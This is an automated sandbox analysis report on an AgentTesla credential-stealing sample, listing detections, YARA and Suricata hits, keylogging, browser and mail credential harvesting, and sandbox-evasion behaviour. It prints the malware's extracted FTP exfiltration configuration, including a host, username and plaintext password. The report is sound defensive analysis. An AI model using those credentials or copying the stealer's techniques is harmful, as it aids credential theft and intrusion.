Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pE7icjUisS.exe

Overview

General Information

Sample name:pE7icjUisS.exe
renamed because original name is a hash value
Original sample name:fcb6030b15822380735483e1911f0148961b7f7cc4a9fe30561825ed3cd22dbc.exe
Analysis ID:1567461
MD5:95c864e4a99b56f70fe18081066ed7b3
SHA1:a8112f75b9869798c6e15782cd651690f1b6faf8
SHA256:fcb6030b15822380735483e1911f0148961b7f7cc4a9fe30561825ed3cd22dbc
Tags:AgentTeslaexeuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • pE7icjUisS.exe (PID: 996 cmdline: "C:\Users\user\Desktop\pE7icjUisS.exe" MD5: 95C864E4A99B56F70FE18081066ED7B3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admins@normagroup.com.tr", "Password": "ab+LNvim5PAo"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
pE7icjUisS.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    pE7icjUisS.exeJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      pE7icjUisS.exeINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
      • 0x3302b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
      • 0x3309d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
      • 0x33127:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
      • 0x331b9:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
      • 0x33223:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
      • 0x33295:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
      • 0x3332b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
      • 0x333bb:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
      pE7icjUisS.exeMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
      • 0x304ae:$s2: GetPrivateProfileString
      • 0x2fb58:$s3: get_OSFullName
      • 0x311ea:$s5: remove_Key
      • 0x3138f:$s5: remove_Key
      • 0x32258:$s6: FtpWebRequest
      • 0x3300d:$s7: logins
      • 0x3357f:$s7: logins
      • 0x36290:$s7: logins
      • 0x36342:$s7: logins
      • 0x37c3e:$s7: logins
      • 0x36edc:$s9: 1.85 (Hash, version 2, native byte-order)

      PCAP (Network Traffic)

      SourceRuleDescriptionAuthorStrings
      dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000002.3856454499.0000000002E9E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          00000000.00000000.1394478448.0000000000B32000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000000.1394478448.0000000000B32000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              00000000.00000002.3856454499.0000000002E51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000000.00000002.3856454499.0000000002E51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  Click to see the 2 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.0.pE7icjUisS.exe.b30000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.0.pE7icjUisS.exe.b30000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      0.0.pE7icjUisS.exe.b30000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                      • 0x3302b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                      • 0x3309d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                      • 0x33127:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                      • 0x331b9:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                      • 0x33223:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                      • 0x33295:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                      • 0x3332b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                      • 0x333bb:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                      0.0.pE7icjUisS.exe.b30000.0.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                      • 0x304ae:$s2: GetPrivateProfileString
                      • 0x2fb58:$s3: get_OSFullName
                      • 0x311ea:$s5: remove_Key
                      • 0x3138f:$s5: remove_Key
                      • 0x32258:$s6: FtpWebRequest
                      • 0x3300d:$s7: logins
                      • 0x3357f:$s7: logins
                      • 0x36290:$s7: logins
                      • 0x36342:$s7: logins
                      • 0x37c3e:$s7: logins
                      • 0x36edc:$s9: 1.85 (Hash, version 2, native byte-order)

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-03T15:57:16.502872+010020299271A Network Trojan was detected192.168.2.749711104.247.165.9921TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-12-03T15:57:17.679216+010028555421A Network Trojan was detected192.168.2.749720104.247.165.9951146TCP
                      2024-12-03T15:57:17.800328+010028555421A Network Trojan was detected192.168.2.749720104.247.165.9951146TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: pE7icjUisS.exeAvira: detected
                      Antivirus detection for URL or domain
                      Source: http://ftp.normagroup.com.trAvira URL Cloud: Label: phishing
                      Found malware configuration
                      Source: pE7icjUisS.exeMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.normagroup.com.tr", "Username": "admins@normagroup.com.tr", "Password": "ab+LNvim5PAo"}
                      Multi AV Scanner detection for submitted file
                      Source: pE7icjUisS.exeReversingLabs: Detection: 81%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: pE7icjUisS.exeJoe Sandbox ML: detected
                      Source: pE7icjUisS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: pE7icjUisS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.7:49720 -> 104.247.165.99:51146
                      Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.7:49711 -> 104.247.165.99:21
                      Source: global trafficTCP traffic: 192.168.2.7:49720 -> 104.247.165.99:51146
                      Source: Joe Sandbox ViewIP Address: 104.247.165.99 104.247.165.99
                      Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                      Source: unknownFTP traffic detected: 104.247.165.99:21 -> 192.168.2.7:49711 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 17:57. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 17:57. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 17:57. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 4 of 50 allowed.220-Local time is now 17:57. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: ftp.normagroup.com.tr
                      Source: pE7icjUisS.exe, 00000000.00000002.3856454499.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, pE7icjUisS.exe, 00000000.00000002.3856454499.0000000002E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.normagroup.com.tr
                      Source: pE7icjUisS.exe, 00000000.00000002.3856454499.0000000002E9E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: pE7icjUisS.exeString found in binary or memory: https://account.dyn.com/

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: pE7icjUisS.exe, oAKy.cs.Net Code: _5754M2
                      Installs a global keyboard hook
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\pE7icjUisS.exeJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: pE7icjUisS.exe, type: SAMPLEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: pE7icjUisS.exe, type: SAMPLEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: 0.0.pE7icjUisS.exe.b30000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.0.pE7icjUisS.exe.b30000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeCode function: 0_2_014D4A600_2_014D4A60
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeCode function: 0_2_014D3E480_2_014D3E48
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeCode function: 0_2_014DD1FB0_2_014DD1FB
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeCode function: 0_2_014D41900_2_014D4190
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeCode function: 0_2_062656C00_2_062656C0
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeCode function: 0_2_06263F300_2_06263F30
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeCode function: 0_2_0626DC000_2_0626DC00
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeCode function: 0_2_0626BCD80_2_0626BCD8
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeCode function: 0_2_06268D1F0_2_06268D1F
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeCode function: 0_2_06262AF80_2_06262AF8
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeCode function: 0_2_062600400_2_06260040
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeCode function: 0_2_06264FE00_2_06264FE0
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeCode function: 0_2_0626321F0_2_0626321F
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeCode function: 0_2_063AF0B80_2_063AF0B8
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeCode function: 0_2_063A11280_2_063A1128
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeCode function: 0_2_063A11220_2_063A1122
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeCode function: 0_2_014DB78A0_2_014DB78A
                      Source: pE7icjUisS.exe, 00000000.00000002.3855637535.00000000010EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs pE7icjUisS.exe
                      Source: pE7icjUisS.exe, 00000000.00000002.3855523364.0000000000EF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs pE7icjUisS.exe
                      Source: pE7icjUisS.exe, 00000000.00000000.1394478448.0000000000B32000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamef7121708-72dc-44f1-ae95-b037bc906047.exe4 vs pE7icjUisS.exe
                      Source: pE7icjUisS.exeBinary or memory string: OriginalFilenamef7121708-72dc-44f1-ae95-b037bc906047.exe4 vs pE7icjUisS.exe
                      Source: pE7icjUisS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: pE7icjUisS.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: pE7icjUisS.exe, type: SAMPLEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: 0.0.pE7icjUisS.exe.b30000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.0.pE7icjUisS.exe.b30000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                      Source: pE7icjUisS.exe, ekKu0.csCryptographic APIs: 'TransformFinalBlock'
                      Source: pE7icjUisS.exe, vKf1z6NvS.csCryptographic APIs: 'TransformFinalBlock'
                      Source: pE7icjUisS.exe, ZNAvlD7qmXc.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: pE7icjUisS.exe, U2doU2.csCryptographic APIs: 'TransformFinalBlock'
                      Source: pE7icjUisS.exe, BgffYko.csCryptographic APIs: 'TransformFinalBlock'
                      Source: pE7icjUisS.exe, HrTdA63.csCryptographic APIs: 'CreateDecryptor'
                      Source: pE7icjUisS.exe, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                      Source: pE7icjUisS.exe, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                      Source: pE7icjUisS.exe, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                      Source: pE7icjUisS.exe, Vvp22TrBv9g.csCryptographic APIs: 'TransformFinalBlock'
                      Source: pE7icjUisS.exeBinary string: ID: 0x{0:X}qSize of the SerializedPropertyStore is less than 8 ({0})/StoreSize: {0} (0x{0X})3\Device\LanmanRedirector\[Failed to retrieve system handle information.
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeMutant created: NULL
                      Source: pE7icjUisS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: pE7icjUisS.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: pE7icjUisS.exeReversingLabs: Detection: 81%
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: pE7icjUisS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: pE7icjUisS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeCode function: 0_2_06263AAF push ebx; retf 0_2_06263ADA
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeMemory allocated: 14D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeMemory allocated: 2E50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeMemory allocated: 4E50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1200000Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1199871Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1199762Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1199656Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1199463Jump to behavior
                      Source: C:\Users\user\Desktop\pE7icjUisS.exeThread delayed: delay time: 1199348Jump to behavior
